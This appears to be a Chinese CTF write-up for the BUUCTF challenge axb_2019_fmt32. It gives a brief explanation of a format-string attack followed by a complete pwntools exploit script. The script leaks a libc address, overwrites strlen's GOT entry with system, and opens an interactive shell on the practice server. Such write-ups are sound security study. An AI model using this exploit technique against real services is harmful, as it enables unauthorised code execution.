很奇怪,onegadget用不出来
格式化字符串漏洞,然后修改got表
1.通过%s泄露got表内容
2.利用%n修改地址内容
from pwn import*from LibcSearcher import*context.log_level = 'debug'io = remote("node4.buuoj.cn",26020)#io = process('./axb_2019_fmt32')elf = ELF('./axb_2019_fmt32')#gdb.attach(io,'b*0x0804874A')puts_got = elf.got['puts']strlen_got = elf.got['strlen']io.recvuntil("Please tell me:")payload = 'a'+p32(puts_got)+'abcd'+"%8$s"io.send(payload)io.recvuntil('abcd')puts_addr=u32(io.recv(4))log.success("puts:"+hex(puts_addr))libc = LibcSearcher('puts',puts_addr)libc_base = puts_addr - libc.dump('puts')system_addr = libc_base +libc.dump('system')bin_sh_addr = libc_base + libc.dump('str_bin_sh')print('system:'+hex(system_addr))sys_high = (system_addr>>16)&0xffffsys_low = system_addr&0xffffio.recvuntil("Please tell me:")payload = 'a'+p32(strlen_got)+p32(strlen_got+2)+'%'+str(sys_low-18)+'c%8$hn'+'%'+str(sys_high-sys_low)+'c%9$hn'#注意这里是9#sys_low-18是因为%n的特性,会把已经打印的也算进去#四个字节一起改,不行好像,我也不知道是不是写错了#改one_gadget 也不行可能也还是写错了io.sendline(payload)io.recvuntil("Please tell me:")io.sendline(';/bin/sh\x00')io.interactive()
若有收获,就点个赞吧
0 人点赞
